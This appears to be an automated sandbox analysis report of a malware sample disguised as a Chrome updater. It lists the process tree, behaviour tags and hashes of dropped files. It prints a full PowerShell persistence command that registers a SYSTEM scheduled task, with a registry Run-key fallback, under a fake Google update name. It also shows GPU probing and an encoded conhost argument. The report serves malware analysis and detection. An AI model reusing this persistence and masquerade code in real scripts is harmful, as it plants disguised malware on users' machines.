C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:4448
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:2800
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xpzzfzp#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2828
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe enhjtjceqq2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4640 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵
- Drops file in Program Files directory
PID:520
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:812 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵PID:1364
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe laqlphgirfhyyngj 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZe7ZXiwOLhA74FQzXCOhDuCEgX6WVRJena9L8fAOb/OCpbdBtftU9QMBxG8aHan0UHttTlDXmg8zTJWEzz1jyzM08ycWZiYcc5uJhds9Rh8+fDvfznlHAMreIYNxYX5k9xJHAc4B0ozcm5wxfAVR1NkkPB2hskLA90oq6EEwunLM+cHugrCZPmAL+xjChc1L0WUYPKljZ7G2hVhhzqEtgfjve5jiLrrwjfPxGeeAf9vve0gqrSPFO0K58xxNJ8ClGMWFD5JSZeWb9oJ+1bT+B66EYQJ/DUpMIB3mc6mheR6Uz+ZAzhdRWTbAqKAh0UuVcyH585aP1fgezLu1rTZuU+ONdhrRHHa5LNYPXLEE9VQc4O1CBkoqHonvDymgjUKbkFny/NdriyHYNCnaqXAUFBsl4P11o9bTzqhZekAP8RUmzlZiL9oK+TCU2oi2CBrYZ+cFhGlXxEFDSR6HvxTxKEz8AeOaHIGd5YzLX/uIE4og0LPZRMb6avDgM7T8uIlhBCKP5Sjpg7sgnkdrvB+eQRIA==2⤵
- Modifies data under HKEY_USERS
PID:2160
-
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2452
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.6MB
MD5e5714adf276ab96cff90d3778ba51b7e
SHA15627bdf380aafe2b131c70e5c857739101a6fac3
SHA2567687dc9e1f582c340a6ce1ffdc1db7b273608e635177f53b65f3cde51f7cf65c
SHA5124dfd0f0e21c8a1865d6acaac6d66761a5b5c31a2fa0ca8960ad498a81930ff31579a56ee4e666b59b31f117e5d078305a1dd50d0a75cdc2a04733364425753c2
-
Filesize
3.6MB
MD5e5714adf276ab96cff90d3778ba51b7e
SHA15627bdf380aafe2b131c70e5c857739101a6fac3
SHA2567687dc9e1f582c340a6ce1ffdc1db7b273608e635177f53b65f3cde51f7cf65c
SHA5124dfd0f0e21c8a1865d6acaac6d66761a5b5c31a2fa0ca8960ad498a81930ff31579a56ee4e666b59b31f117e5d078305a1dd50d0a75cdc2a04733364425753c2
-
Filesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD562623d22bd9e037191765d5083ce16a3
SHA14a07da6872672f715a4780513d95ed8ddeefd259
SHA25695d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010
SHA5129a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992
-
Filesize
1KB
MD5345a00303aa64d7f0f47bab11f6af65a
SHA167af6c9e1b03a402e0402cbdc0ebe6d454653f5c
SHA25676f8251c4fa11533e3279c16fcc18edb97f9bd3ef71063fbc56c3d871c9f5365
SHA512787862dbd0278767f89222024ed2cc8ae93f5bb89530a38a0c1531cfc98b98f6770039734bc4592a15f269cfeffacdf5a24a1fe7b33cf5b88884155295cab6e8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD500930b40cba79465b7a38ed0449d1449
SHA14b25a89ee28b20ba162f23772ddaf017669092a5
SHA256eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5